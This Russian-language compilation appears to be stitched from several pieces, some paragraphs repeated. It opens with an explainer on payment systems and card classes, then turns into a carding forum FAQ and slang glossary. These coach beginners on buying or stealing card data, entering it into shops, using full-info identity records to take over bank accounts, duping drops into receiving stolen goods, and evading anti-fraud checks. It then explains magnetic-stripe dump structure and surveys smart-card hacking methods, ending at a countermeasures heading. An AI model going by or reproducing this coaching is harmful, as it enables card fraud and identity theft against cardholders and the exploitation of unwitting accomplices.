Всевозможных платежных систем в мире несчетное количество - в каждой стране своя и чаще всего не одна, есть также и международные системы. Кстати, к платежным системам относятся не только банковские, но еще и системы путешествий и развлечений – так называемыеT&E (Travel & Entertainment), например, American Express и Dinners Club. Из международных систем выделяются всего несколько крупнейших: Visa, Eurocard/MasterCard, American Express (AmEx) & Dinners Club International (DCI). Также можно отметить самые масштабные системы в России: Union Card, STB и Золотая корона (правда, преимущества этих систем очень сомнительны из-за их малой распространенности). Кстати, в России, в отличие от других стран, для того, чтобы стать эмитентом, необходима специальная лицензия Центробанка.
Бесспорно, самая популярная система в мире – Visa. Эта система применяется примерно в 20000 банках в 72 странах мира, про количество пользователей говорить не имеет смысла - с каждым днем их число неуклонно растет.
Вторая по величине система Europay International. Она объединяет в себе сразу две крупных подсистемы: Eurocard/MasterCard и Cirrus/Maestro.
Теперь немного про составляющие платежной системы. За функционирование системы отвечают несколько участников (точнее, видов участников). Это эмитенты, эквайреры и расчетные банки. Каждый из участников должен четко выполнять свои функции. Эквайрер – банк, который обслуживает все необходимые финансовые сделки по кредам. Эмитент – сама организация, которая выпустила креду. Расчетные банки играют роль регуляторов между всеми участниками сделки (следят за переводом денежных средств и прочее). Нужно отметить, что за это отвечают не обязательно разные банки – все эти функции может выполнять один-единственный банк.
Классы карт
Каждая платежная система выпускает несколько видов кред, чтобы любой смог выбрать кредитку, нужную именно ему. Класс карты определяет почти все ее характеристики (остальные определяет банк). Обычно выпускаются креды электронного (для банкоматов и терминалов), экономичного, стандартного и элитного класса. Чем дороже карта, тем больше у нее преимуществ: большой лимит кредита, принимается в большем количестве мест, ты получаешь множество всяких скидок, подарков и прочего, плюс, конечно, великолепный сервис.
Visa предлагает на выбор кредитки Electron, Classic, Gold, Platinum и несколько других, более редких. Я расположил креды в порядке их стоимости. За годовое обслуживание Visa Electron берут примерно 5 баксов, за Classic – 25, а за Gold – все 100. Visa Electron предназначена только для использования в банкоматах и электронных терминалах в магазинах. Classic и Gold – кредитки класса повыше, но для их использования необходимо, чтобы баланс твоего счета не опускался ниже определенной суммы: обычно $100 для Classic и $1000 для Gold (хотя иногда такое ограничение банками опускается). Различие между Classic и Gold довольно незначительно, отличаются они в основном большим количеством дополнительных фишек у последней. Это были дебетовые карточки. Visa Platinum – это уже овердрафтная карта. Стоит эта карта соответственно названию, и получить ее тяжело. Но за это ты получаешь кредитный лимит в $20000 и просто немыслимое количество всяких страховок, скидок и прочего и прочего.
В системе Eurocard/MasterCard применяются аналогичные креды: Cirrus/Maestro, Mass, Gold. Все характеристики примерно те же, что и у Visa.
Электронные карты
Ни для кого не секрет, что по кредиткам можно расплачиваться и в инете. Все бы хорошо, но тут возникает большая проблема безопасности. Для оплаты покупки непосредственно в интернет-магазине приходится сообщать свои идентификационные данные, после этого их конфиденциальность оказывается под угрозой. Для того чтобы обезопасить все финансовые операции через Сеть, созданы специальные платежные подсистемы. Таких систем в инете очень много, пожалуй, самая известная в России – WebMoney, но она не ориентируется на работу с кредитками, поэтому WebMoney я рассматривать не буду. Прочие популярные системы: CyberPlat, ASSIST, PayCash, RBS и ЭлИТ. Принцип функционирования этих систем примерно одинаков – они являются посредниками между тобой, банком и интернет-магазином. Конечно, за свои услуги они оставляют себе некоторый процент от суммы сделки, но зато гарантируют сохранность твоих средств и конфиденциальность данных. Почти все эти системы обеспечивают работу с картами международных платежных систем Visa, Eurocard/Mastercard, American Express и Dinners Club, а также иногда обслуживают и креды российских платежных систем.
Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL; используется цифровая подпись; гарантируется юридическая чистота обеих сторон; используются особые сертификаты SET; полная выписка счета обо всех проведенных финансовых операциях. Такая схема удобна и продавцам, и покупателям, которым не жалко отдать какую-то сумму за безопасность. Есть у таких систем и свои минусы: например, можно работать только с магазином, зарегистрированным в данной сети. Также иногда для работы необходимо поставить фирменную программу.
Итого
Вот, собственно, и все, что я хотел рассказать про роль и функции кредиток в финансовой системе. На тему кредиток пишут диссертации, создают целые порталы в Сети, пишут огромные документации. Сам понимаешь, весь этот материал просто невозможно было охватить, но я постарался описать все самое существенное и примечательное.
Словарь
Аверс – лицевая сторона кредитки
Импринтер – девайс у продавца, делающий отпечаток эмбоссированных данных на чек
Картридер – устройство для чтения данных с карты
Расчетный банк – банк, регулирующий финансовые операции между участниками сделки
Реверс – оборотная сторона креды
Типпинг – процесс оттиска эмбоссированных данных на чек
Эквайрер – банк, входящий в платежную систему и обслуживающий все финансовые операции по кредам
Эмбоссинг – процесс выдавливания (тиснение) текста на поверхности кредитки, таким образом выдавливают номер креды/дату окончания ее действия/кард-холдерс-нейм и прочее (отсюда название карт - эмбоссированные)
Эмитент – организация, выпустившая карточку
Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца.
Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.
Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL.
Q: Что такое креды, CC, картон и где их достать?
A: Это и есть кредитные карты, именно благодаря им существуем мы.
Способов достать CC много - от банальной кражи до взлома интернет магазина, но на данном этапе я бы посоветовал вам незаморачиваться и просто купить их у известных людей на данном форуме.
Q: Я новичек в кардинге. В какой теме лучше начать работать?
A: Если вообще ноль в кардинге, то мой тебе совет начинать с вбива, для того чтобы хоть немного получить представление о кардинге. Прочти все статьи в этом разделе - это поможет тебе составить хоть какое-то представление о нашем деле.
Настрой машину для вбива, обеспечь себе безопасность и ищи работодателя.
Q: Кто такой вбивальшик?
A: Это человек который занимается вбивом информации по кредитной карте в какой нибудь магазин, от него во много зависит удачный исход всей операции. Подробнее о том что это такое вы можете узнать здесь.
Q: Примерно сколько получает вбивальщик за свою работу?
A: Ну это все зависет от того как вы договаритесь со своим работадателем, чей будет расходный материал (карты, прокси и т.д.) и какова сложность работы. В среднем за вбив платят от $2 до $5.
Q: Что такое эмитет?
A: Это банк который выпустил саму кредитную карту, узнать название банка который эмитировал карту можно с помощью программы CC2Bank
Q: Что такое бин?
A: Бин это первые 4 или 6 символов в номере кредитной карты, именно по нему и узнают что за банк эмитирует кредитную карту, а также тип карты.
Q: Что такое CVV/CVV2 код?
A: Это 3-4 дополнительные цифры, призванные улучшить защиту кредитных карт, в данный момент очень тяжело найти места где бы принимали карты без CVV.
Q: Как выглядит информация по кредитной карте?
A: Подробнее об этом вы можете узнать здесь
Q: Что такое карты с Full Info и зачем они нужны?
A: Это информация по кредитной карте включающая в себя по мимо стандартных данных еще и SSN, DOB, PIN, MMN и т.д. Такая информация нужна в тех случаях когда требуются более полные данные по держателю карты (например при энроле) или обнале.
DOB - Date of birth
SSN - Social Security Number
MMN - Mothers Maiden Name
Некоторые фулки включают в себя PIN => они же дампы.
Для обнала такой карты тебе нужны след. данные cc# ,exp, PIN,определённый бин по которому налят (т.е. если у карты нет track2,чтобы генераторщик смог пробить его по определённым бинам) и естественно опытный нальщик.
Q: Кто такой дроп?
A: Это человек принимающий на своё имя какой либо скарженый тобой товар, после чего он пересылает его тебе или другому дропу (вообще тут бывают разные варианты). Чаще всего дропы не знают что они принимают украденные вещи и рано или поздно за ними придут копы.
Q: Я снял с карты около $50-$100 станут ли меня искать за эти деньги?
A: По идеи конечно вас должны будут искать, но на практике это бессмыслено, т.к. ваши поиски выльются в более крупные суммы.
Q: Что такое PayPal или палка?
A: Очень популярна онлайновая система оплаты различных услуг в USA, имеется возможность пополнения аккаунта с помощью кредитной карты.
Q: Вы не могли бы подсказать шопы которые 100% шлют товар?
A: Нет, это информация представляет собой определённую ценность и просто так вам никто не подскажет шоп который 100% шлёт товар.
Q: Что такое tracking number или трэк?
A: После того как ты заказал в шопе товар его высылают на дропа с помощью почты или курьерской службы. Самые известные из этих служб UPS, FedEx, AirBorne и т.д. Так вот после того как товар будет выслан тебе выдаётся этот самый трэк, с помощью которого на сайте курьерской службы ты и можешь узнать где в данный момент находится посылка.
Q: Как мне перевести деньги с кредитной карты на WM?
A: Никаких способов напрямую перевести деньги с кредитной карты на WebMoney несуществует.
Q: Что такое фрауд?
A: В переводе с английского "мошенничество", в принципе перевод полностью отображает значение этого термина.
Q: Что такое антифрод и как его обойти?
A: Это система защиты от мошенничества - различные дополнительные проверки.
Как обойти - будь полностью как амер, во всех ипостасях, и будет всё ок.
Иногда проще забить на шоп с сильной системой антифрода, чем пытаться ее обойти.
Credit line - сумма кредита, которую банк дает (доверяет) на траты и покупки сейчас и которую клиент сможет погасить потом.
Current Balance - сколько потратил, столько потом придется возвращать банку.
А из Credit line вычитается
Available Credit - сколько еще можно потратить.
Карта или точнее кредит выдается на год или несколько лет. Поэтому на карте пишется
Expiration date - месяц и год, когда договор с банком закончится. Например 06/2006.
Каждая карта уникальна. Для поддержания этой уникальности на них пишут
Card Number - число, чаще всего 16-ти значное. Реже встречаются 13-ти значные. У American Express по умолчанию 15-ти значное.
Следят и ухаживают за всей этой махиной расчетов по кредитным картам
Visa и Mastercard/Eurocard - международные платежные системы (МПС). У Визы номера карт начинаются на 4, у Мастеркард на 5. Остальные брэнды не так развиты и дальше собственной страны можно сказать не лезут (American Express, Discover, JCB, Золотая Корона и др.)
Бывает, что карты роняют, но не нагибаются за ними, т.к. издали она похожа на кусок мыла, и идут дальше. А поскольку при покупках на большие суммы частенько спрашивают документ, удостоверяющий личность, то для того чтобы внимательные уборщики не могли отовариваться за чужой счет, на лицевой стороне карты пишут
Cardholder's Name - имя и фамилия держателя карты. (Карта - собственность банка. Клиенту она выдается только поносить с собой, т.е. быть этим самым держателем.)
А чтобы обладатели фотографической памяти, увидев все реквизиты карты в руках владельца, не могли потом ничего купить по телефону или в онлайне по чужой карте, на ее обратной стороне пишется
CVC2 или CVV2 - три секретных цифры мелким шрифтом. У Мастеркарда это называется Card Validation Code, у Визы - Card Verification Value.
Чтобы кардхолдер знал сколько он потратил или внес на счет, банк высылает ему
Statement - ежемесячный детализированый отчет обо всех движениях денег на карте, где построчно указаны стоимость кольта, услуг юриста, налога на развлечения и т.д.
Там имеются такие важные для банка и нелюбимые кардхолдерами поля как
Minimum Payment Due - сумма ежемесячного платежа, вычисляемая и пересчитываемая каждый месяц цифра, не менее которой клиент должен вернуть банку за потраченое. Общая сумма долга делится на оставшиеся месяцы до конца договора, накручиваются проценты и все это клиент оплачивает понемножку каждый месяц вместо того чтобы вывалить мешок килобаксов на стол в конце срока. Да и надежней, не сбежит с деньгами и не умрет не вовремя.
Payment Due Date - не позже этого числа каждый месяц кардхолдер и оплачивает свой Minimum Payment Due иначе банк накрутит еще
LATE FEE - посуточный штраф за опоздание платежа.
Из лимитов в стейтменте можно еще увидеть
Cash Advance Limit - такую максимальную сумму можно получить по карте деньгами в банкомате всего (не за один раз). Единоразовый, а точнее суточный лимит по CA чаще всего бывает $500. Но в разных банках он может быть больше или меньше.
Термины в разных банках могут отличаться от вышеприеденных, но надеюсь, суть понятна, чтобы не путать баланс к оплате с лимитом на растраты. Основная путаница возникает из за принципиально иного типа карт - дебетовых. Вот там да, сколько положил на счет, столько и можешь потратить, т.е. баланс в прямом понимании.
Слэнг
billing address, биллинг - адрес проживания, куда отправляется Statement.
billing phone - телефон холдера, по которому звонит банк или шоп в случае каких нибудь неувязок.
shipping address, шиппинг - адрес, куда магазин должен отправить заказанный товар. Для крупных покупок требуется, чтобы он совпадал с биллинг адресом или был вписан в банке в свойства карты именно как шиппинг, иначе будут
траблы - trouble, проблема то есть. Траблы с шопом решаются
прозвоном - т.е. звонком в магазин с подтверждением покупки, биллинг и шиппинг адресов и всяческой своей лояльности. Если траблы с английским или немецким языком, можно заказать услуги прозвонщика, который все это профессионально (по возможности) сделает. Прозвонщику нужно сказать всю информацию, которую потребует шоп при разговоре. В разных шопах она разная, но во всех спросят
ордер (order) - номер заказа, сделанного на сайте. О чем договорились прозвонщик и шоп, можно узнать не только со слов прозвонщика, но и на сайте магазина через некоторое время. У ордера могут быть разные статусы в зависимости от магазина и используемого в нем софта. До прозвона дело может даже не дойти, если использовать
энролл (enroll) - доступ к данным карты через сайт банка. Опять же, в каждом банке своя система. Где-то может понадобиться только
MMN (mother's maiden name) - девичья фамилией матери. Где-то вместе с
DOB (date of birth) - датой рождения. Тде-то только
SSN (social secure number) - индивидуальный номер налогоплательшика. Где-то комбинация вышеперечисленных с номером ПИН или даже с
DL (driver's license) - номером водительских прав. Обычно это секретная информация. Но ведь существует
пробив - нахождение SSN, DOB, MMN, DL по различным базам данных. Пробивщик за денежку найдет данные почти на любого американца. Если время не позволяет озадачиваться пробивом или пробивщики все попропадали в оффлайн, можно купить
фуллка (full info) - все данные кардхолдера, достаточные для регистрации энролла на сайте банка.
Заэнроллив там карту, можно изменить биллинг телефон на свой, а биллиг адрес на адрес своего или чужого
дроп - человека, согласного принять и переправить куда скажут купленный товар. Делает он это за деньги или красивые обещания, как получится. Вообще этой темой занимается
дроповод - специалист по промыванию мозгов у дропов, чтобы они согласились работать с ворованным товаром. Но бывают не только
разводные дропы - "развели как лоха", но и неразводные дропы. Это партнеры, которые знают, чем занимаются и активно содействуют. Как то ищут съемные квартиры, шлют сканы документов при необходимости, могут прозвонить шоп и т.д. Требуют себе большую долю, часто кидают, но работать с ними проще конечно.
Так вот насчет ордера. Самый лучший и последний его статус:
shipped - отправлено на шиппинг адрес. Если дроповод надежный и дропы у него стабильные, можно начинать плясать, уворовано успешно. Только нужно сообщить дроповоду
трэк (tracking number) - уникальный номер посылки в почтово-курьерской службе, например в DHL, UPS или FedEx. Он появляется на сайте шопа в деталях ордера после отправки. По этому номеру можно отслеживать на сайте выбранной для отправки службы статус посылки, где она находится и что с ней происходит. Как только статус станет
delivered - доставлено, ответственность за товар переходит к дроповоду и в ближайшие дни он заплатит за товар (по идее). Кстати, следите в каком городе то доставленно. А то бывает, что посылка обратно в шоп возвращается и delivered получается слегка не там, где ожидалось.
Из негативных терминов canceled, declined, suspended, FBI, USSS, дроповод кинул. Желаю всем никогда с ними не сталкиваться, ну или хотя бы с минимальными потерями.
Не путайте ДАМПЫ с СС!
Итак, сейчас опишем что у нас должно быть написано на дорожке. Нас интересует вторая дорожка, и что же мы на ней можем увидеть?:
Она может содержать до 40 символов:
Сначала идет стартовый символ - %
Потом идет PAN - до 19 цифр, в нашем случае это номер карты.
В него входит код эмиттера карты (IIN: Issuer Identification Number) (до 6 символов), который в свою очередь состоит из:
Основного промышленного индентификатора (MII: Major Industry Identifier) (до 2х символов):
0: Зарезервированно для будущего использования стандартом ISO/TC 68.
00: Не для выпуска карт
1: Авиалинии.
2: Авиалинии и для будущего использования.
3: Путешествия и развлечения.
4: Банк/финансы.
5: Банк/финансы.
59: Финансовые организации не попадающие в рамки ISO.
6: Банки и мерчи.
7: Топливная промышленность.
8: Телекоммуникации и для будущего использования.
89: Телекоммуникации и для часных агенств.
9: Зарезервировано для национального использования.
Далее идет код эммитера (II: Issuer Identifier), до 5 цифр, в некоторых случаях пишется длинна INN или его размер если он выходит за пределы ISO. Если MII равен 9 то первые три цифры - это код страны(для нас интереса не представляет)
Потом идет индивидуальный номер аккаунта (IAI: Individual Account Identification), до 12 цифр, назначается организацией, выдавшей карту
Затем идет одна цифра, используемая для проверки номера и прочей информации, вычесляется по формуле: (чуть попозже выложу формулу)
PAN мастеркарда состоит из не более 16 символов, а у VISA - 13 или 16, включая проверочную цифру.
Далее идет разделитель, один символ - =
За ним следует в некоторых случаях код страны(если PAN начинается с 59), он определяется в ISO 3166: 724 для Испании, 840 для USA и тд.
Потом в большинстве случаев идет дата окончания действия карты в формате ГГММ(годмесяц).
Затем идет трехсимвольный сервисный код, он состоит из:
Первая цифра, определяет где можно использовать карту:
0: Зарезервировано для будущего использования.
1: Для международного использования.
2: Для международного использования, с ограничениями.
3: Зарезервировано для будущего использования.
4: Зарезервировано для будущего использования.
5: Только для внутреннего использования, кроме заранее оговоренных соглашений.
6: Только для внутреннего использования, кроме заранее оговоренных соглашений, с ограничениями.
7: Не для оплаты, кроме заранее оговоренных соглашений.
8: Зарезервировано для будущего использования.
9: Для проверки.
Вторая цифра, определяет условия использования/авторизации карты(Authorization processing):
0: Транзакции осуществляются по стандартным правилам.
1: Зарезервировано для будущего использования.
2: Транзакция осуществляется эммитером, должна быть онлайн.
3: Зарезервировано для будущего использования.
4: Транзакция осуществляется эммитером, должна быть онлайн, кроме заранее оговоренных соглашений.
5: Зарезервировано для будущего использования.
6: Зарезервировано для будущего использования.
7: Зарезервировано для будущего использования.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.
Третья цифра, определяет сервисы и условия требования PIN
0: Без ограничений, нужен PIN.
1: Без ограничений.
2: Товары и услуги (не наличка).
3: ATM только и нужен PIN.
4: Только деньги.
5: Товары и услуги (не наличка) и нужен PIN.
6: Без ограничений, PIN по требованию.
7: Товары и услуги (не наличка) и PIN по требованию.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.
Потом идет хэш PVV (PIN Verification Value), 5 символов, за ним символы, зарезервируемые для использования эммитером. И в конце всего стоит завершающий символ - ?
Пример второй дорожки (придуманный): ;4598530106131217=06081211834918387276?
Обзор методов взлома смарт-карт
Индустрия смарт-карт переживает период мощного расцвета. В 2002 году по всему миру было продано почти 2 миллиарда интеллектуальных карточек со встроенным микрочипом, а в ближайшие годы ожидается рост этих цифр в разы.
Причины этого просты - области применения смарт-карт все время расширяются: от телефонной карты до жетона аутентификации пользователя ПК, от "электронного кошелька" для хранения цифровых наличных до цифрового паспорта-идентификатора. Массовое внедрение смарт-карт в повседневную жизнь сопровождается непременными заверениями официальных представителей индустрии о том, что чип-карты - это наиболее безопасная из существующих на сегодня технологий, которую сложно (читай - практически невозможно) вскрыть. Но мы с тобой знаем, что это вовсе не так.
Нравится это кому-то или нет, но вскрытие смарт-карт - явление весьма давнее и распространенное повсеместно. Как свидетельствуют специалисты, примерно с 1994 года практически все типы смарт-карточных чипов, использовавшихся в европейских, а затем в американских и азиатских системах платного телевидения, были успешно вскрыты крякерами при помощи методов обратной инженерной разработки. А добытые секреты карт (схема и ключевой материал) затем продавались на черном рынке в виде нелегальных клон-карт для просмотра закрытых ТВ-каналов на халяву.
Менее освещено в прессе другое направление - подделка телефонных смарт-карт или электронных кошельков. Однако известно, что и в этой области далеко не все в порядке с противодействием взлому. Индустрии приходится регулярно заниматься обновлением технологий защиты процессора смарт-карт, крякеры в ответ разрабатывают более изощренные методы вскрытия, и так до бесконечности.
Разновидности технологий
Классификация методов вскрытия смарт-карт может несколько различаться у разных авторов, однако чаще всего выделяют следующие категории атак, которые обычно применяются в разных сочетаниях друг с другом.
Технологии микрозондирования - с помощью микроскопа и иглы микропробника позволяет получить доступ непосредственно к поверхности чипа, где атакующий регистрирует прохождение информации (побитно), манипулирует процессами и вмешивается в работу интегральной схемы.
Программные атаки- используют обычный коммуникационный интерфейс процессора смарт-карты и эксплуатирует уязвимости защиты, выявленные в протоколах, криптографических алгоритмах и других особенностях конкретной реализации схемы. Отмечу, что чем более зрелой является технология защиты, тем чаще приходится сочетать этот метод с другими методами атак.
Анализ побочных каналов утечки информации- атакующий с высокой по времени частотой снимает аналоговые характеристики колебаний в питании и интерфейсных соединениях, а также любые другие электромагнитные излучения, порождаемые элементами схемы процессора (транзисторами, триггерами и т.п.) в ходе обычной работы.
Технологии индуцирования сбоев- напротив, создаются нештатные условия эксплуатации, чтобы вызвать ошибки в работе процессора и открыть таким образом дополнительные каналы доступа к защищенной информации.
Разрушающие атаки
Типичный чиповый модуль смарт-карты имеет тонкое пластиковое основание размером порядка одного квадратного сантиметра с контактными зонами с обеих сторон. Одна сторона модуля видна на самой смарт-карте и контактирует со считывателем. Кремниевая матрица приклеена к другой стороне основания (подсоединение с помощью тонких золотых или алюминиевых проводов). Сторона пластины, где находится чип, покрыта эпоксидной смолой, и такой чиповый модуль вклеивается в карту.
Вынуть чип из карты легко. Прежде умельцы вынимали с помощью острого ножа или ланцета, срезая пластик тыльной стороны карты до тех пор, пока не покажется эпоксидка. Позже стали быстро вынимать чип, просто разогревая пластмассу до мягкого состояния. Далее эпоксидный слой удаляется нанесением нескольких капель концентрированной азотной кислоты (более 98%). Прежде чем кислота успевает растворить слишком много эпоксидного слоя и затвердеть, кислоту и смолу смывают ацетоном. Процедура повторяется от 5 до 10 раз, пока полностью не покажется кремниевая матрица. Производить подобное надругательство над чипом необходимо аккуратно, чтобы не повредить соединительную проводку, тогда он останется работоспособным.
Если процессор совершенно новый, придется создать карту его схем. Сейчас для этого обычно применяют оптический микроскоп и цифровую камеру, с помощью которых делают большую (размером в несколько метров) мозаику из снимков поверхности чипа высокого разрешения.
У большинства чипов имеется защитный поверхностный слой (пассивация) из оксида или нитрата кремния, который предохраняет их от излучений оборудования и диффузии ионов. Азотная кислота на него не действует, поэтому для его удаления специалисты используют сложный метод сухого травления. Но это не единственная возможность для доступа к поверхности.
Другим методом, особенно когда схема в целом известна, является использование игл-микропробников, которые с помощью ультразвуковой вибрации удаляют защитный слой непосредственно под точкой контакта. Кроме того, для локального удаления защитного слоя применяются лазерные резаки-микроскопы, используемые в лабораториях клеточной биологии.
Описанная техника вскрытия, которую, я надеюсь, ты не опух читать, успешно применяется любителями-крякерами. Именно любителями, так как технологии, описанные дальше, доступны только хорошо оснащенным лабораториям, которые занимаются изучением полупроводников. В мире насчитываются сотни таких лабораторий (к примеру, в университетах и промышленных исследовательских центрах). Наиболее продвинутые крякеры арендуют эту технику.
Исследование техники разрезания чипа ведет к более общей (и сравнительно менее изученной) проблеме - атакам, которые включают в себя активную модификацию исследуемого чипа, а не просто пассивное его исследование. К примеру, есть все основания полагать, что некоторые успешные атаки пиратов на систему платного телевидения проводились с использованием рабочих станций с фокусированием ионного пучка (Focused Ion Beam workstation - FIB). Такой аппарат может вырезать траки в металлизированном слое чипа и формировать новые траки или изолирующие слои. Кроме того, FIB может имплантировать ионы для изменения толщины слоя кремния и даже строить сквозные переходы к проводящим структурам в нижележащих слоях чипа. Такие аппараты стоят несколько миллионов долларов, но, как показывает практика, не слишком богатые злоумышленники арендуют дорогое оборудование на некоторое время у крупных полупроводниковых компаний.
Обеспеченные таким инструментарием атаки на смарт-карты становятся более простыми и мощными. Типичная атака заключается в отсоединении от шины почти всех процессов ЦПУ, кроме памяти EEPROM и той компоненты ЦПУ, что генерирует доступ по чтению. Например, программный счетчик может быть оставлен подсоединенным таким образом, что области памяти по порядку становятся доступны на считывание по мере подачи тактовых импульсов.
Как только это сделано, атакующему требуется лишь одна игла микропробника для считывания всего содержимого EEPROM. В результате процесс анализа становится более легким, чем при пассивном исследовании, когда обычно анализируется только трасса выполнения. Также это помогает избежать чисто механических трудностей одновременной работы с несколькими иглами-микропробниками на линиях шины, ширина которых составляет лишь несколько микрон.
Технологии индуцирования сбоев (глич-атаки)
В принципе, создателям вычислительной техники давно известно, что к инженерно-защищенным устройствам, типа смарт-карт, которые обычно малы и компактны, с целью вызова вычислительной ошибки можно применить некоторые уровни радиационного облучения или нагревания, подачу неправильного напряжения питания или нестандартную тактовую частоту. Известно также и то, что при возникновении сбоя в вычислениях компьютерное устройство может выдать информацию, полезную для восстановления секретных данных. Однако насколько серьезна эта угроза в действительности, долгое время мало кто подозревал.
В конце сентября 1996 года коллектив авторов из Bellcore (научно-исследовательский центр американской компании Bell) сообщил о том, что обнаружена серьезная потенциальная слабость общего характера в защищенных криптографических устройствах, в частности, в смарт-картах для электронных платежей (D. Boneh, R.A. DeMillo, R.J. Lipton: "On the Importance of Checking Cryptographic Protocols for Faults", www.demillo.com/PDF/smart.pdf). Авторы назвали свой метод вскрытия "Криптоанализ при сбоях оборудования" (Cryptanalysis in the Presence of Hardware Faults). Суть же его в том, что, искусственно вызывая ошибку в работе электронной схемы с помощью ионизации или микроволнового облучения, а затем сравнивая сбойные значения на выходе устройства с заведомо правильными значениями, теоретически можно восстанавливать криптографическую информацию, хранящуюся в смарт-карте. Исследования ученых показали, что новой угрозе подвержены все устройства, использующие криптоалгоритмы с открытыми ключами для шифрования информации и аутентификации пользователя. Это могут быть смарт-карты, применяемые для хранения данных (например, электронных денег), SIM-карточки для сотовой телефонии, карточки, генерирующие электронные подписи или обеспечивающие аутентификацию пользователя при удаленном доступе к корпоративным сетям. Правда, разработанная в Bellcore атака была применима для вскрытия ключей исключительно в криптосхемах с открытым ключом - RSA, алгоритм цифровой подписи Рабина, схема идентификации Фиата-Шамира и т.д.
Главным результатом публикации работы Bellcore стало то, что к известной в узком кругу проблеме было привлечено внимание гораздо большего числа исследователей. И меньше чем через месяц после появления статьи Бонэ-ДеМилло (в октябре 1996 года) стало известно о разработке аналогичной теоретической атаки в отношении симметричных криптоалгоритмов, то есть шифров закрытия данных с общим секретным ключом. Новый метод был разработан знаменитым тандемом израильских криптографов Эли Бихамом и Ади Шамиром, получив название "Дифференциальный анализ искажений" (сокращенно ДАИ).
На примере самого распространенного блочного шифра DES эти авторы продемонстрировали, что в рамках той же "беллкоровской" модели сбоя в работе аппаратуры можно "вытащить" полный ключ DES из защищенной смарт-карты путем анализа менее 200 блоков шифртекста (блок DES - 8 байт). Более того, впоследствии появился еще ряд работ Бихама - Шамира с описанием методов извлечения ключа из смарт-карты в условиях, когда о реализованной внутри криптосхеме неизвестно практически ничего. Окончательную версию статьи с описанием этой работы утягивай с www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-get.cgi/1997/CS/CS0910.revised.ps.
Анализ побочных каналов утечки информации
Летом 1998 года пришло известие еще об одном методе вскрытия смарт-карт, более чем успешно реализованном на практике. Совсем небольшая, состоящая из 4 человек консалтинговая криптофирма Cryptography Research из Сан-Франциско разработала чрезвычайно эффективный аналитический инструментарий для извлечения секретных ключей из криптографических устройств. Забавно, но, по словам главы фирмы Пола Кочера, исследователям "не удалось найти ни одной карты, которую нельзя было бы вскрыть".
При этом Кочер по образованию биолог, а хакерством занимался с детства как хобби. Не исключено, что именно биологическое образование помогло ему выработать собственный стиль анализа "черных ящиков", относясь к ним как к живым организмам и внимательно исследуя все доступные признаки их "жизнедеятельности".
Кочер и его коллеги, по сути, переизобрели секретные методы спецслужб и научились вскрывать защиту смарт-карт с помощью привлечения аппарата математической статистики и алгебраических методов исправления ошибок для анализа флуктуаций (небольшие колебания) в потреблении чипом электропитания. Делалось это примерно в течение полутора лет с 1996 по 1998 год, когда специалисты Cryptography Research выясняли, каким образом можно было бы повысить стойкость портативных криптографических жетонов, включая смарт-карты. Не предавая свои исследования широкой огласке, они знакомили сообщество производителей смарт-карт с разработанными в фирме видами атак, получившими названия "простой анализ питания" (ПАП) и "дифференциальный анализ питания" (ДАП). Если хочешь покопаться в этом направлении глубже, загляни по ссылочке www.cryptography.com/resources/whitepapers/DPA.html.
Вполне очевидно, что такие методы анализа заслуживают самого серьезного внимания, поскольку атаки такого рода можно проводить быстро и используя уже готовое оборудование ценой от нескольких сотен до нескольких тысяч долларов. Базовые же концепции новой методики вскрытия сформулированы в более ранней и довольно известной работе Пола Кочера "Криптоанализ на основе таймерной атаки" (в 1995 году - www.cryptography.com/resources/whitepapers/TimingAttacks.pdf). В этой работе было продемонстрировано, что можно вскрывать криптоустройства, просто точно замеряя интервалы времени, которые требуются на обработку данных.
Что же касается ПАП-атак, то здесь аналитик непосредственно наблюдает за динамикой потребления энергии системой. Количество расходуемой энергии изменяется в зависимости от выполняемой микропроцессором инструкции, а для точного отслеживания флуктуаций в потреблении питания можно использовать чувствительный амперметр. Так выявляются большие блоки инструкций (циклы DES, операции RSA и т.п.), поскольку эти операции, выполняемые процессором, имеют внутри себя существенно различающиеся по виду фрагменты. При большем усилении удается выделять и отдельные инструкции. В то время как ПАП-атаки главным образом строятся на визуальном анализе с целью выделения значимых флуктуаций питания, значительно более эффективный метод ДАП построен на статистическом анализе и технологиях исправления ошибок для выделения информации, имеющей корреляции с секретными ключами.
Новые методы атак и считывания информации из памяти
В июне 2002 года был обнародован еще один метод вскрытия смарт-карт и защищенных микроконтроллеров, получивший название "optical fault induction attack" ("атака оптическим индуцированием сбоев" - www.cl.cam.ac.uk/~sps32/ches02-optofault.pdf). Этот класс атак был обнаружен и исследован в Кембриджском университете аспирантом Сергеем Скоробогатовым (кстати, выпускником МИФИ 1997 года) и его руководителем Россом Андерсоном.
Суть метода в том, что сфокусированное освещение конкретного транзистора в электронной схеме стимулирует в нем проводимость, чем вызывается кратковременный сбой. Такого рода атаки оказываются довольно дешевыми и практичными, для них не требуется сложного и дорогого лазерного оборудования. Например, сами кембриджские исследователи в качестве мощного источника света использовали фотовспышку, купленную в магазине подержанных товаров за 20 фунтов стерлингов.
Для иллюстрации мощи новой атаки была разработана методика, позволяющая с помощью вспышки и микроскопа выставлять в нужное значение (0 или 1) любой бит в SRAM-памяти микроконтроллера. Методом "оптического зондирования" (optical probing) можно индуцировать сбои в работе криптографических алгоритмов или протоколов, а также вносить искажения в поток управляющих команд процессора. Понятно, что перечисленные возможности существенно расширяют уже известные "сбойные" методы вскрытия криптосхем и извлечения секретной информации из смарт-карт.
Индустрия, как обычно, пытается всячески принизить значимость нового метода вскрытия, поскольку он относится к классу разрушающих атак, сопровождающихся повреждением защитного слоя в чипе смарт-карты. Однако, по свидетельству Андерсона, злоумышленники могут обойтись и минимальным физическим вмешательством: кремний прозрачен в инфракрасном диапазоне, поэтому атаку можно проводить прямо через кремниевую подложку с задней стороны чипа, сняв лишь пластик. Используя же рентгеновское излучение, карту и вовсе можно оставить нетронутой.
Меры противодействия
